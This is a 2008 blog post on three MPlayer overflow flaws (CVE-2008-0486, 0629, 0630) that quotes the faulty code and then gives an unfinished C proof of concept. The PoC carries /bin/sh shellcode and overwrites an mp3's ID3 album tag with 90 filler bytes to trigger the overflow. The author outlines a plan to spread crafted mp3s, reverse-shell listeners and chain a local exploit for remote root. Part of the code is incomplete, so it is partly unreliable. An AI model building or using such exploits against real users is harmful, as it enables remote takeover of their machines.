miércoles, febrero 13, 2008

MPlayer Security

MPlayer started 2008 the wrong way, 3 dangerous security flaws has been reported.

* CVE-2008-0486 Stack overflow line 229 demux_audio.c
Attack Vector: .mov file header

ptr += 4;
comment = ptr;
+ if (&comment[length] < comments ||
&comment[length] >= &comments[blk_len])
+ return;
c = comment[length];
comment[length] = 0;


* CVE-2008-0629 Overflow stream/g
Attack Vector: Album title

strncpy(album_title, ptr, len);
album_title[len-2]='\0';


The -2 is wrong.


* CVE-2008-0630 Overflow url.c
Attack Vector: Long url will avoid the final \0

The most dangerous scenario is to publish a mp3 with a crafted album name, who listen this mp3 by cddp:// will be infected or reverse-shelled, then with the vmsplice exploit remote root will be

Recommendation: Always the same always, keep your software uptdated and audited!

I'm doing the POC:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

char sha0code[] =
"\xeb\x16\x5b\x31\xc0"
"\x50\x53\xb0\x0b\x89"
"\xdb\x89\xe1\x31\xd2"
"\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80\xe8"
"\xe5\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68";

int checkIdent(char *ptr) {
if (ptr[0] == 'T' &&
ptr[1] == 'A' &&
ptr[2] == 'G')
return -1;
else
return 0;
}

int main (int argc, char **argv) {
char *mp3file;
int fd;
int bytes;
int i;
unsigned long map;
char *tag;
char *album;

if (argc != 2) {
printf("USAGE: %s FileToInjectTheExploit.mp3\n",argv[0]);
return 0;
}

//map mp3 to memory
fd = open(argv[1],O_RDWR);
bytes = lseek(fd,0,SEEK_END);
mp3file = (char *)malloc(bytes);
lseek(fd,0,SEEK_SET);
bytes = read(fd,mp3file,bytes);

//look for mp3 tag structure
for (i=bytes; i>100; i--) {
if (checkIdent(i+mp3file)) {
album = mp3file+i+3+30+30;
break;
}
}

//inject the evil string
printf("Album:%s\n",album);
memset(album,0x41,90);

//write changes
lseek(fd,0,SEEK_SET);
write(fd,mp3file,bytes);
close(fd);
free(mp3file);
}